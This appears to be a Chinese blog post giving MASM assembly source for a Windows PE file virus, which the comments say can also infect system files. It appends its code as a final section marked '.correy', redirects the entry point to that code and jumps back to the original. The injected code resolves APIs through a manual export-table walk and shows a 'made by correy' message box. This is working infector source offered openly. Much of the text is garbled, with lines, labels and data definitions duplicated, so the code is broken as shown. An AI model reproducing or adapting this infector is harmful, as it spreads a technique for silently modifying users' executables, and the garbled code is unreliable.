;在最后一个节添加代码并先运行。
;不足的地方敬请指导,如优化程序,加快速度,减少代码等。
;不能感染正在运行的文件(包括本身)。
;感染一些文件(加密,压缩,打包,加壳等程序)能成功,但运行之后不能正常运行原来的程序。
;可以感染系统文件。
;没有没有异常处理。
;不足的地方敬请指导,如优化程序,加快速度,减少代码等。
;不能感染正在运行的文件(包括本身)。
;感染一些文件(加密,压缩,打包,加壳等程序)能成功,但运行之后不能正常运行原来的程序。
;可以感染系统文件。
;没有没有异常处理。
.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include comdlg32.inc
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
include user32.inc
include comdlg32.inc
includelib user32.lib
includelib kernel32.lib
includelib comdlg32.lib
includelib kernel32.lib
includelib comdlg32.lib
.data
FilterString db "pe File (*.exe, *.dll)",0,"*.exe;*.dll",0,0
sectionname db ".correy ",0;新加节的名字。同时也是感染标志。
Characteristics dword 0e0000020h ;新加节的属性。
infect db "文件已经感染!",0
FilterString db "pe File (*.exe, *.dll)",0,"*.exe;*.dll",0,0
sectionname db ".correy ",0;新加节的名字。同时也是感染标志。
Characteristics dword 0e0000020h ;新加节的属性。
infect db "文件已经感染!",0
.data?
ofn OPENFILENAME <>
buffercmp db 40 dup (?)
buffer db 4096 DUP (?)
mz dd ?
pe dd ?
OptionalHeader dd ?
header dd ?
sizeOfOptionalHeader dd ?
sizeofallheader dd ?
lsizeofallheader dd ?
sections dd ?
newheader dd ?;新添加节的节头的位置
lnewheader dd ? ;新添加节的节头的距离
hfile dd ?
lpe dd ? ;pe的距离
sectionalignment dd ?
filealignment dd ?
x dd ?
y dd ?
z dd ?
startwritecode dd ?
newsizeofimage dd ?
newvirtualsize dd ?
newsizeofrawdata dd ?
oldaddressofentrypoint dd ?
newaddressofentrypoint dd ?
ofn OPENFILENAME <>
buffercmp db 40 dup (?)
buffer db 4096 DUP (?)
mz dd ?
pe dd ?
OptionalHeader dd ?
header dd ?
sizeOfOptionalHeader dd ?
sizeofallheader dd ?
lsizeofallheader dd ?
sections dd ?
newheader dd ?;新添加节的节头的位置
lnewheader dd ? ;新添加节的节头的距离
hfile dd ?
lpe dd ? ;pe的距离
sectionalignment dd ?
filealignment dd ?
x dd ?
y dd ?
z dd ?
startwritecode dd ?
newsizeofimage dd ?
newvirtualsize dd ?
newsizeofrawdata dd ?
oldaddressofentrypoint dd ?
newaddressofentrypoint dd ?
.code
correy db "made by correy ",0
vdata db 0
vdata db 0
szGetProcAddress db "GetProcAddress",0
szLoadLibrary db 'LoadLibraryA',0
szUser32 db 'user32',0
szmessagebox db 'MessageBoxA',0
szLoadLibrary db 'LoadLibraryA',0
szUser32 db 'user32',0
szmessagebox db 'MessageBoxA',0
pel dd ?;
OptionalHeaderl dd ?;
headerl dd ? ;
sizeOfOptionalHeaderl dd ?;
sectionsl dd ?
nnps dd ?
e dd ?;
k dd ?;
apiaddress dd ?;
apinameaddress dd ?;
ordinaladdress dd ?;
apis dd ?
n dd ?;
i dd ?;
o dd ?;
f dd ?;
ob dd ?
ipapiloadlibrary dd ?
ipapiuser32 dd ?
ipapimessagebox dd ?
OptionalHeaderl dd ?;
headerl dd ? ;
sizeOfOptionalHeaderl dd ?;
sectionsl dd ?
nnps dd ?
e dd ?;
k dd ?;
apiaddress dd ?;
apinameaddress dd ?;
ordinaladdress dd ?;
apis dd ?
n dd ?;
i dd ?;
o dd ?;
f dd ?;
ob dd ?
ipapiloadlibrary dd ?
ipapiuser32 dd ?
ipapimessagebox dd ?
vstartcode:
call rel
rel: pop ebx
sub ebx,rel
rel: pop ebx
sub ebx,rel
push [esp]
mov edi,[esp]
and edi,0ffff0000h
againk:push edi
cmp word ptr [edi],5a4dh
jne nextk
add edi,[edi+3ch]
cmp word ptr [edi],4550h
jne nextk
pop edi
mov eax,edi
jmp showk
nextk:pop edi
sub edi,10000h
jmp againk
showk:mov [ebx+k],eax;[ebx+]
add eax,3ch
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+pel],eax
mov edi,[esp]
and edi,0ffff0000h
againk:push edi
cmp word ptr [edi],5a4dh
jne nextk
add edi,[edi+3ch]
cmp word ptr [edi],4550h
jne nextk
pop edi
mov eax,edi
jmp showk
nextk:pop edi
sub edi,10000h
jmp againk
showk:mov [ebx+k],eax;[ebx+]
add eax,3ch
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+pel],eax
mov esi,[ebx+pel]
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sectionsl],edx
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sectionsl],edx
mov esi,[ebx+pel]
add esi,24
mov [ebx+OptionalHeaderl],esi ;保存可选头的地址。
add esi,24
mov [ebx+OptionalHeaderl],esi ;保存可选头的地址。
mov esi,[ebx+pel]
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sizeOfOptionalHeaderl],edx
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov [ebx+sizeOfOptionalHeaderl],edx
mov esi,[ebx+OptionalHeaderl ]
add esi,[ebx+sizeOfOptionalHeaderl]
mov [ebx+headerl],esi ;保存节头的地址。
add esi,[ebx+sizeOfOptionalHeaderl]
mov [ebx+headerl],esi ;保存节头的地址。
mov esi,[ebx+OptionalHeaderl]
add esi,96
mov esi,[esi]
mov edi,esi
add esi,96
mov esi,[esi]
mov edi,esi
add esi,[ebx+k]
add edi,[ebx+k]
mov [ebx+e],edi;导出节或导出目录表的首地址
add edi,[ebx+k]
mov [ebx+e],edi;导出节或导出目录表的首地址
mov edi,[ebx+e]
add edi,12
mov edi,[edi]
add edi,[ebx+k]
add edi,12
mov edi,[edi]
add edi,[ebx+k]
mov edi,[ebx+e]
add edi,16
mov edi,[edi]
mov [ebx+ob],edi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,20
mov edi,[edi]
mov [ebx+apis],edi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,24
mov edi,[edi]
mov [ebx+nnps],edi
add edi,16
mov edi,[edi]
mov [ebx+ob],edi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,20
mov edi,[edi]
mov [ebx+apis],edi
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov edi,[ebx+e]
add edi,24
mov edi,[edi]
mov [ebx+nnps],edi
mov edi,[ebx+e]
add edi,28
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apiaddress],edi ;导出地址表的首地址
add edi,28
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apiaddress],edi ;导出地址表的首地址
mov edi,[ebx+e]
add edi,32
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apinameaddress],edi ;导出名称指针表的首地址
add edi,32
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+apinameaddress],edi ;导出名称指针表的首地址
mov edi,[ebx+e]
add edi,36
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+ordinaladdress],edi ;导出序数表的首地址
add edi,36
mov edi,[edi]
add edi,[ebx+k]
mov [ebx+ordinaladdress],edi ;导出序数表的首地址
;求GetProcAddress函数在文件中的位置
mov edx,[ebx+apinameaddress]
xor eax,eax
againke:push edx
mov edi,[edx]
add edi,[ebx+k]
mov edx,[ebx+apinameaddress]
xor eax,eax
againke:push edx
mov edi,[edx]
add edi,[ebx+k]
push eax
lea eax,[ebx+szGetProcAddress]
mov esi,eax
pop eax
lea eax,[ebx+szGetProcAddress]
mov esi,eax
pop eax
mov ecx,14;GetProcAddress字符的长度。
repe cmpsb
je nextke
pop edx
add edx,4
inc eax
jmp againke
nextke:
repe cmpsb
je nextke
pop edx
add edx,4
inc eax
jmp againke
nextke:
pop edx ;//建议加上这一行,保持堆栈平衡,这个浪费了我1-2天的时间.
add eax,[ebx+ob];加上基数
mov [ebx+i],eax
mov [ebx+i],eax
;求GetProcAddress函数的序数
mov eax,[ebx+i]
mov edx,[ebx+ordinaladdress]
shl eax,1
add eax,edx
movzx eax,word ptr [eax]
mov [ebx+o],eax
mov eax,[ebx+i]
mov edx,[ebx+ordinaladdress]
shl eax,1
add eax,edx
movzx eax,word ptr [eax]
mov [ebx+o],eax
;求GetProcAddress函数的地址
mov eax,[ebx+o]
sub eax,[ebx+ob];减去基数
mov edx,[ebx+apiaddress]
shl eax,2
add eax,edx
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+f],eax
mov eax,[ebx+o]
sub eax,[ebx+ob];减去基数
mov edx,[ebx+apiaddress]
shl eax,2
add eax,edx
mov eax,[eax]
add eax,[ebx+k]
mov [ebx+f],eax
;求loadlibrary函数的地址
lea eax,[ebx+szLoadLibrary]
push eax
push [ebx+k]
call [ebx+f];eax
mov [ebx+ipapiloadlibrary],eax
lea eax,[ebx+szLoadLibrary]
push eax
push [ebx+k]
call [ebx+f];eax
mov [ebx+ipapiloadlibrary],eax
;求user32.dll文件的地址
lea eax,[ebx+szUser32]
push eax
call [ebx+ipapiloadlibrary]
mov [ebx+ipapiuser32],eax
lea eax,[ebx+szUser32]
push eax
call [ebx+ipapiloadlibrary]
mov [ebx+ipapiuser32],eax
;求MessageBox函数的地址
lea eax,[ebx+szmessagebox]
push eax
push [ebx+ipapiuser32]
call [ebx+f]
mov [ebx+ipapimessagebox],eax
lea eax,[ebx+szmessagebox]
push eax
push [ebx+ipapiuser32]
call [ebx+f]
mov [ebx+ipapimessagebox],eax
;显示一个信息
push 0
lea eax,[ebx+correy]
push eax
push eax
push 0
call [ebx+ipapimessagebox]
push 0
lea eax,[ebx+correy]
push eax
push eax
push 0
call [ebx+ipapimessagebox]
jmptoold:
db 0e9h
db 0e9h
oldentry:
dd ?
dd ?
vendcode dd ?
alignit proc sizes,aligns
push edx
mov eax,sizes
xor edx,edx
div aligns
cmp edx,0
je next
inc eax
next:mul aligns
pop edx
ret
alignit endp
push edx
mov eax,sizes
xor edx,edx
div aligns
cmp edx,0
je next
inc eax
next:mul aligns
pop edx
ret
alignit endp
start:
mov ofn.lStructSize,SIZEOF ofn
mov ofn.lpstrFilter, OFFSET FilterString
mov ofn.lpstrFile, OFFSET buffer
mov ofn.nMaxFile,512
mov ofn.Flags,00281804h
invoke GetOpenFileName, ADDR ofn
invoke CreateFile,addr buffer,0c0000000h,3,0,3,80h,0
mov hfile,eax
invoke CreateFileMapping,eax,0,2,0,0,0
invoke MapViewOfFile,eax,4,0,0,0
;没有判断是否是pe文件,有极少数带pe后缀名却非正常pe格式的。
mov mz,eax
mov ofn.lStructSize,SIZEOF ofn
mov ofn.lpstrFilter, OFFSET FilterString
mov ofn.lpstrFile, OFFSET buffer
mov ofn.nMaxFile,512
mov ofn.Flags,00281804h
invoke GetOpenFileName, ADDR ofn
invoke CreateFile,addr buffer,0c0000000h,3,0,3,80h,0
mov hfile,eax
invoke CreateFileMapping,eax,0,2,0,0,0
invoke MapViewOfFile,eax,4,0,0,0
;没有判断是否是pe文件,有极少数带pe后缀名却非正常pe格式的。
mov mz,eax
mov esi,mz
add esi,3ch
mov esi,[esi]
mov lpe,esi
mov eax,mz
add esi,eax
mov pe,esi;"pe"的位置。
add esi,3ch
mov esi,[esi]
mov lpe,esi
mov eax,mz
add esi,eax
mov pe,esi;"pe"的位置。
mov esi,pe
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov sections,edx;节的数目。
add esi,6
mov dx,word ptr [esi]
movsx edx,dx
mov sections,edx;节的数目。
mov esi,pe
add esi,24
mov OptionalHeader,esi ;可选头的地址。
add esi,24
mov OptionalHeader,esi ;可选头的地址。
mov esi,pe
add esi,40
mov esi,[esi]
mov oldaddressofentrypoint,esi ;原来程序的入口点
add esi,40
mov esi,[esi]
mov oldaddressofentrypoint,esi ;原来程序的入口点
mov esi,pe
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov sizeOfOptionalHeader,edx;可选头的大小。
add esi,20
mov dx,word ptr [esi]
movsx edx,dx
mov sizeOfOptionalHeader,edx;可选头的大小。
mov esi,pe
add esi,84
mov esi,[esi]
mov sizeofallheader,esi ;pe文件头的大小
add esi,84
mov esi,[esi]
mov sizeofallheader,esi ;pe文件头的大小
mov eax,mz
add eax,sizeofallheader
mov lsizeofallheader,eax;第一个节的位置,也就是文件头的尾部。
add eax,sizeofallheader
mov lsizeofallheader,eax;第一个节的位置,也就是文件头的尾部。
mov esi,pe
add esi,56
mov esi,[esi]
mov sectionalignment,esi ;节对齐的尺寸。
add esi,56
mov esi,[esi]
mov sectionalignment,esi ;节对齐的尺寸。
mov esi,pe
add esi,60
mov esi,[esi]
mov filealignment,esi ;文件对齐的尺寸。
add esi,60
mov esi,[esi]
mov filealignment,esi ;文件对齐的尺寸。
mov esi,OptionalHeader
add esi,sizeOfOptionalHeader
mov header,esi ;保存节头的地址。
add esi,sizeOfOptionalHeader
mov header,esi ;保存节头的地址。
mov eax,40
mov ebx,sections
mul ebx
add eax,header
mov newheader,eax;预定新添加节的节头的位置
sub eax,mz
mov lnewheader,eax
mov ebx,sections
mul ebx
add eax,header
mov newheader,eax;预定新添加节的节头的位置
sub eax,mz
mov lnewheader,eax
;判断是否已经感染,感染标志是最后一个节头的名字。
mov eax,newheader
sub eax,40
mov esi,eax
lea edi,sectionname
mov ecx,8
repe cmpsb
je infected
mov eax,newheader
sub eax,40
mov esi,eax
lea edi,sectionname
mov ecx,8
repe cmpsb
je infected
startadd:
mov eax,newheader
sub eax,20
mov eax,[eax]
mov x,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,x
mov startwritecode,eax
sub eax,20
mov eax,[eax]
mov x,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,x
mov startwritecode,eax
;设置最后一个节的属性
mov eax,lnewheader
sub eax,4
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr Characteristics,4,addr buffer,0
mov eax,lnewheader
sub eax,4
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr Characteristics,4,addr buffer,0
;修改可选头的sizeofimage
mov eax,newheader
sub eax,32
mov eax,[eax]
mov x,eax
push sectionalignment
push eax
call alignit
mov y,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
mov x,eax
push sectionalignment
push eax
call alignit
mov y,eax
mov eax,x
add eax,offset vendcode - offset correy
push sectionalignment
push eax
call alignit
sub eax,y
mov y,eax
add eax,offset vendcode - offset correy
push sectionalignment
push eax
call alignit
sub eax,y
mov y,eax
mov eax,pe
add eax,80
mov eax,[eax]
add eax,y
mov newsizeofimage,eax
add eax,80
mov eax,[eax]
add eax,y
mov newsizeofimage,eax
mov ebx,lpe
add ebx,80
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofimage,4,addr buffer,0
add ebx,80
invoke SetFilePointer,hfile,ebx,0,0
invoke WriteFile,hfile,addr newsizeofimage,4,addr buffer,0
;修改程序的入口点
mov eax,newheader
sub eax,28
mov eax,[eax]
mov y,eax
mov eax,newheader
sub eax,28
mov eax,[eax]
mov y,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
sub eax,32
mov eax,[eax]
add eax,y
mov y,eax
mov y,eax
mov eax,lpe
add eax,40
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vstartcode - offset correy
mov newaddressofentrypoint,eax
invoke WriteFile,hfile,addr newaddressofentrypoint,4,addr buffer,0
add eax,40
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vstartcode - offset correy
mov newaddressofentrypoint,eax
invoke WriteFile,hfile,addr newaddressofentrypoint,4,addr buffer,0
;写文件
invoke SetFilePointer,hfile,startwritecode,0,0
invoke WriteFile,hfile,addr correy,offset vendcode - offset correy,addr buffer,0
invoke SetFilePointer,hfile,startwritecode,0,0
invoke WriteFile,hfile,addr correy,offset vendcode - offset correy,addr buffer,0
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,offset vendcode - offset correy
push filealignment
push eax
call alignit
sub eax,32
mov eax,[eax]
add eax,offset vendcode - offset correy
push filealignment
push eax
call alignit
mov x,eax
mov eax,newheader
sub eax,20
mov eax,[eax]
add eax,x
mov x,eax
invoke SetFilePointer,hfile,x,0,0
mov eax,newheader
sub eax,20
mov eax,[eax]
add eax,x
mov x,eax
invoke SetFilePointer,hfile,x,0,0
mov eax,x
sub eax,sizeof correy
invoke SetFilePointer,hfile,eax,0,0;wrong
invoke WriteFile,hfile,addr correy,sizeof correy,addr buffer,0
sub eax,sizeof correy
invoke SetFilePointer,hfile,eax,0,0;wrong
invoke WriteFile,hfile,addr correy,sizeof correy,addr buffer,0
;修改最后一个节的名字,作为感染标志。
mov eax,lnewheader
sub eax,40
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr sectionname,8,addr buffer,0
mov eax,lnewheader
sub eax,40
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr sectionname,8,addr buffer,0
;设置最后一个节的的virtualsize
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,offset vendcode - offset correy
mov newvirtualsize,eax
mov eax,newheader
sub eax,32
mov eax,[eax]
add eax,offset vendcode - offset correy
mov newvirtualsize,eax
mov eax,lnewheader
sub eax,32
invoke SetFilePointer,hfile,eax,0,0
sub eax,32
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr newvirtualsize,4,addr buffer,0
;设置最后一个节的sizeofrawdata
push filealignment
push newvirtualsize
call alignit
mov newsizeofrawdata,eax
;设置最后一个节的sizeofrawdata
push filealignment
push newvirtualsize
call alignit
mov newsizeofrawdata,eax
mov eax,lnewheader
sub eax,24
invoke SetFilePointer,hfile,eax,0,0
sub eax,24
invoke SetFilePointer,hfile,eax,0,0
invoke WriteFile,hfile,addr newsizeofrawdata,4,addr buffer,0
;转回源程序的入口点
mov eax,startwritecode
add eax,offset oldentry - offset correy
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vendcode - offset correy
sub oldaddressofentrypoint,eax
invoke WriteFile,hfile,addr oldaddressofentrypoint,4,addr buffer,0
mov eax,startwritecode
add eax,offset oldentry - offset correy
invoke SetFilePointer,hfile,eax,0,0
mov eax,y
add eax,offset vendcode - offset correy
sub oldaddressofentrypoint,eax
invoke WriteFile,hfile,addr oldaddressofentrypoint,4,addr buffer,0
invoke FlushFileBuffers,hfile
invoke CloseHandle,hfile
jmp exit
invoke CloseHandle,hfile
jmp exit
infected:invoke MessageBox,0,addr infect,addr infect,0
exit:
invoke ExitProcess,NULL
end start
;made at 2010.08.24
invoke ExitProcess,NULL
end start
;made at 2010.08.24
没有评论:
发表评论